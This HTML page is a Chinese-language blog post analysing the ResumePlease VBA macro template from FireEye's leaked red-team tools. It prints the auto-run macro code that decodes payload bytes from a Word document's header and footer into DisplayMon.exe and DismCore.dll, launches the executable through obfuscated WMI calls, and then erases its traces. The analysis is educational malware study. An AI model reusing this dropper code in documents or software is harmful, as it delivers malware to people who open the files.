<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="google-site-verification" content="EG4Bjpdp2Ab8fVRRgskXpY8SWbusBOQsiHA-qLNx6kw" />
  <meta name="msvalidate.01" content="B8A0A64EAB0FC5E0F51FE913998A0618" />

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yjy123123.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="简单的分析一下Fireeye之前泄漏的红队工具里面的ResumePlease。 注意，我说的简单分析真的是简单分析，并没有谦虚的意思。">
<meta property="og:type" content="article">
<meta property="og:title" content="ResumePlease宏恶意模板分析">
<meta property="og:url" content="http://yjy123123.github.io/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="yjy&#39;s Blog">
<meta property="og:description" content="简单的分析一下Fireeye之前泄漏的红队工具里面的ResumePlease。 注意，我说的简单分析真的是简单分析，并没有谦虚的意思。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yjy123123.github.io/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/1.png">
<meta property="article:published_time" content="2021-05-15T02:32:58.000Z">
<meta property="article:modified_time" content="2021-05-18T12:07:53.118Z">
<meta property="article:author" content="yjy123">
<meta property="article:tag" content="恶意代码">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yjy123123.github.io/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/1.png">

<link rel="canonical" href="http://yjy123123.github.io/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>ResumePlease宏恶意模板分析 | yjy's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">yjy's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://yjy123123.github.io/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="yjy123">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yjy's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          ResumePlease宏恶意模板分析
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-05-15 10:32:58" itemprop="dateCreated datePublished" datetime="2021-05-15T10:32:58+08:00">2021-05-15</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-05-18 20:07:53" itemprop="dateModified" datetime="2021-05-18T20:07:53+08:00">2021-05-18</time>
              </span>

          
            <span id="/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/" class="post-meta-item leancloud_visitors" data-flag-title="ResumePlease宏恶意模板分析" title="Views">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span class="leancloud-visitors-count"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine: </span>
    
    <a title="valine" href="/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>简单的分析一下Fireeye之前泄漏的红队工具里面的ResumePlease。</p>
<p>注意，我说的简单分析真的是简单分析，并没有谦虚的意思。</p>
<a id="more"></a>

<p>感觉好久没更博客了，都快不知道怎么新建文章了，五一放完假之后都在忙课堂展示，过程真的略操蛋，因为找到的一些样本都好难分析，换了好几个样本。</p>
<h3 id="样本信息"><a href="#样本信息" class="headerlink" title="样本信息"></a>样本信息</h3><p>样本基本信息：</p>
<blockquote>
<p><strong>MD5</strong>            5e8343ce6c6e2894f46648c532b241e3</p>
<p><strong>SHA1</strong>           6339a5d6543343c868499acb6dd42e2d56e51391</p>
<p><strong>SHA256</strong>       1866449e8ad2c55240eafdf14fc835138ca3e99a7b180c2150cef047868f56cc</p>
<p><strong>文件类型</strong>       Visual Basic Script File</p>
<p><strong>文件大小</strong>        4449字节</p>
</blockquote>
<p>这个文件我是从<a target="_blank" rel="noopener" href="https://malshare.com/">MalShare</a>下载的。</p>
<p>这里推荐一下<a target="_blank" rel="noopener" href="https://ti.qianxin.com/">奇安信威胁情报中心</a>是一个在线沙箱检测的网站，还挺好用的。</p>
<h3 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h3><p><a target="_blank" rel="noopener" href="https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools">Tactics, Techniques and Procedures (TTPs) Utilized by FireEye’s Red Team Tools</a></p>
<p><a target="_blank" rel="noopener" href="https://www.antiy.cn/research/notice&report/research_report/20201214.html">FireEye红队工具失窃事件跟进分析</a></p>
<p>上面这两篇文章里面都提到ResumePlease这个样本，根据这两篇文章里面的描述，ResumePlease是一个Microsoft Office宏恶意软件模板，它并不能单独执行，需要绑定有恶意载荷的文件，才能生成恶意文件。</p>
<p>VBA（Visual Basic for Applications）是Visual Basic的一种宏语言。主要能用来扩展Windows的应用程序功能，特别是Microsoft Office软件。</p>
<h3 id="样本分析"><a href="#样本分析" class="headerlink" title="样本分析"></a>样本分析</h3><h4 id="Document-Open"><a href="#Document-Open" class="headerlink" title="Document_Open()"></a>Document_Open()</h4><p>首先是<code>Document_Open()</code>函数，定义文档打开后的一些操作。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Sub Document_Open()</span><br><span class="line"> </span><br><span class="line">&#39;#</span><br><span class="line">    writeOutHeader</span><br><span class="line">    writeOutFooter</span><br><span class="line">    DoStuff</span><br><span class="line">    Cleanup</span><br></pre></td></tr></table></figure>
<h4 id="writeOutHeader"><a href="#writeOutHeader" class="headerlink" title="writeOutHeader()"></a>writeOutHeader()</h4><p>（1）开始是一系列变量声明，Dim是VB中声明变量并分配存储空间的语句；</p>
<p>（2）之后就是构造文件路径dropPath，这里相当于创建了一个DisplayMon.exe文件，后续会对该文件进行写入操作；</p>
<p>（3）Office VBA官方文档中提到wdHeaderFooterPrimary的一些信息和使用方法，strIn这里获取的是第一节的页眉，strln就是恶意payload；</p>
<p>（4）InStr函数将也页眉中获取的strIn通过’;’进行分割，然后写入DisplayMon.exe文件中。</p>
<blockquote>
<p>使用<strong>标头</strong>（索引）或<strong>页脚</strong>（索引），其中索引是<strong>WdHeaderFooterIndex</strong>常量之一（<strong>wdHeaderFooterEvenPages</strong>、 <strong>wdHeaderFooterFirstPage</strong>或<strong>wdHeaderFooterPrimary</strong>），返回一个<strong>HeaderFooter</strong>对象。</p>
</blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">Sub writeOutHeader()</span><br><span class="line">    On Error Resume Next</span><br><span class="line">    Dim intFileNum As Integer</span><br><span class="line">    Dim byteTemp As Byte</span><br><span class="line">    Dim strByte1 As String</span><br><span class="line">    Dim i, j, k As Double</span><br><span class="line">    Dim strIn As String</span><br><span class="line">    Dim blnDone As Boolean</span><br><span class="line">    intFileNum &#x3D; FreeFile</span><br><span class="line">    Dim dropPath As String</span><br><span class="line">    </span><br><span class="line">    dropPath &#x3D; Environ(&quot;LOCALAPPDATA&quot;) &amp; &quot;\DisplayMon.exe&quot;</span><br><span class="line">    &#96; Environ获取环境变量，这里是生成DisplayMon.exe程序</span><br><span class="line"></span><br><span class="line">    Open dropPath For Binary As intFileNum</span><br><span class="line">    &#96; 打开文件</span><br><span class="line"></span><br><span class="line">    strIn &#x3D; ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text</span><br><span class="line">    &#96; ActiveDocument为office VBA编程接口 获取活动文档第一节的页眉</span><br><span class="line">    blnDone &#x3D; False</span><br><span class="line">    i &#x3D; 1</span><br><span class="line">    j &#x3D; 1</span><br><span class="line"></span><br><span class="line">    Do While Not blnDone</span><br><span class="line">        k &#x3D; InStr(i + 1, strIn, &quot;;&quot;)</span><br><span class="line">        &#96; InStr函数：返回一个 **Variant **(Long) 值，指定一个字符串在另一个字符串中首次出现的位置。</span><br><span class="line">        If k &#x3D; 0 Then</span><br><span class="line">            blnDone &#x3D; True</span><br><span class="line">        Else</span><br><span class="line">            blnDone &#x3D; False</span><br><span class="line">            strByte1 &#x3D; Mid(strIn, i + 1, k - i - 1)</span><br><span class="line">            &#39; a &#x3D; CLng(strByte1)</span><br><span class="line">            Put intFileNum, , CByte(strByte1)</span><br><span class="line">            &#96; put语法  Put [#]filenumber, [recnumber], varname  这里是将strIn中内容，循环写入DisplayMon.exe文件</span><br><span class="line">            i &#x3D; k</span><br><span class="line">            strByte1 &#x3D; &quot;&quot;</span><br><span class="line">            j &#x3D; j + 1</span><br><span class="line">            End If</span><br><span class="line">    Loop</span><br><span class="line">    Close intFileNum</span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure>
<p>writeOutFooter与writeOutHeader基本上一样的，只不过将文档第一节的页脚内容写入DismCore.dll文件中。</p>
<h4 id="DoStuff"><a href="#DoStuff" class="headerlink" title="DoStuff()"></a>DoStuff()</h4><p>Dostuff()函数就是用来调用Windows内置函数来允许之前生成的恶意文件DisplayMon.exe</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Sub DoStuff()</span><br><span class="line"></span><br><span class="line">    Const WHAT &#x3D; 12</span><br><span class="line">    blah &#x3D; Environ(&quot;LOCALAPPDATA&quot;) &amp; &quot;\DisplayMon.exe&quot;</span><br><span class="line">    Set serveYa &#x3D; GetObject(&quot;wi&quot; &amp; &quot;nmg&quot; &amp; &quot;mts:\\.\r&quot; &amp; &quot;oot\ci&quot; &amp; &quot;mv2&quot;)</span><br><span class="line">    &#96; winmgmts:\\.\root\cimv2   遍历进程列表</span><br><span class="line">    Set startYa &#x3D; serveYa.Get(&quot;Wi&quot; &amp; &quot;n32_Pr&quot; &amp; &quot;ocessS&quot; &amp; &quot;tartup&quot;)</span><br><span class="line">    &#96; Win32_ProcessStartup  基于Windows的进程的启动配置</span><br><span class="line">    Set whatYa &#x3D; startYa.SpawnInstance_</span><br><span class="line">    whatYa.ShowWindow &#x3D; WHAT</span><br><span class="line">    Set procYa &#x3D; GetObject(&quot;wi&quot; &amp; &quot;nmgmt&quot; &amp; &quot;s:r&quot; &amp; &quot;oot\ci&quot; &amp; &quot;mv2:W&quot; &amp; &quot;in32_P&quot; &amp; &quot;rocess&quot;)</span><br><span class="line">    res &#x3D; procYa.Create(blah, Null, whatYa, processid)</span><br><span class="line">    &#96; 运行DisplayMon.exe</span><br><span class="line"></span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure>
<h4 id="Cleanup"><a href="#Cleanup" class="headerlink" title="Cleanup()"></a>Cleanup()</h4><p>Cleanup()函数就是将office文件里面的恶意载荷清空，这样有一定隐蔽性，用户再打开恶意office文件的时候也无法发现什么。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Sub Cleanup()</span><br><span class="line"></span><br><span class="line">    ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).Range.Text &#x3D; &quot;&quot;</span><br><span class="line">    ActiveDocument.Sections(1).Footers(wdHeaderFooterPrimary).Range.Text &#x3D; &quot;&quot;</span><br><span class="line">    ActiveDocument.Save</span><br><span class="line"></span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure>


<p>这个文件只是一个模板，没有办法运行，本来想找一个相关的payload，但是搞完这个展示就懒了，不知道啥时候还会想起来弄。</p>
<p>还有就是不知道为什么安天分析报告里面强调是excel文件，感觉代码里面并没有体现这一点。</p>
<p>月底估计还有一个样本分析相关的博客。</p>
<hr>
<p>5.18补充</p>
<p>看了中国大学mooc里面的《软件安全之恶意代码机理与防护》，C7脚本病毒及宏病毒里面就讲了相关内容。</p>
<p>（1）一个是宏病毒感染机理：存在于数据文件或模板中，利用宏语言的功能将自己寄生到其他数据文档。</p>
<p>（2）其次是一些会自动执行的宏，Document_Open()就是一个自动执行的宏，有机会执行恶意行为，</p>
<p><img src="/2021/05/15/ResumePlease%E5%AE%8F%E6%81%B6%E6%84%8F%E6%A8%A1%E6%9D%BF%E5%88%86%E6%9E%90/1.png"></p>
<p>（3）拆分一次字符串，简单的混淆方法</p>
<p><code>GetObject(&quot;wi&quot; &amp; &quot;nmgmt&quot; &amp; &quot;s:r&quot; &amp; &quot;oot\ci&quot; &amp; &quot;mv2:W&quot; &amp; &quot;in32_P&quot; &amp; &quot;rocess&quot;)</code> </p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%81%B6%E6%84%8F%E4%BB%A3%E7%A0%81/" rel="tag"># 恶意代码</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/04/10/XCTF%E9%80%86%E5%90%91%E8%BF%9B%E9%98%B6%E5%8C%BAWriteup%E5%90%88%E9%9B%86/" rel="prev" title="XCTF逆向进阶区Writeup合集">
      <i class="fa fa-chevron-left"></i> XCTF逆向进阶区Writeup合集
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/05/15/XSS%E8%87%AA%E5%8A%A8%E5%8C%96%E6%A3%80%E6%B5%8B%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8%E8%AE%B0%E5%BD%95/" rel="next" title="XSS自动化检测工具使用记录">
      XSS自动化检测工具使用记录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%B7%E6%9C%AC%E4%BF%A1%E6%81%AF"><span class="nav-number">1.</span> <span class="nav-text">样本信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86"><span class="nav-number">2.</span> <span class="nav-text">前置知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A0%B7%E6%9C%AC%E5%88%86%E6%9E%90"><span class="nav-number">3.</span> <span class="nav-text">样本分析</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Document-Open"><span class="nav-number">3.1.</span> <span class="nav-text">Document_Open()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#writeOutHeader"><span class="nav-number">3.2.</span> <span class="nav-text">writeOutHeader()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#DoStuff"><span class="nav-number">3.3.</span> <span class="nav-text">DoStuff()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Cleanup"><span class="nav-number">3.4.</span> <span class="nav-text">Cleanup()</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">yjy123</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/yjy123123" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yjy123123" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:674943053@qq.com" title="E-Mail → mailto:674943053@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">yjy123</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'zB1H0PKzDpjxuuiBc2N34Cns-gzGzoHsz',
      appKey     : 'HBLQQLpG46wIWMhTv8jWvCu9',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : false,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
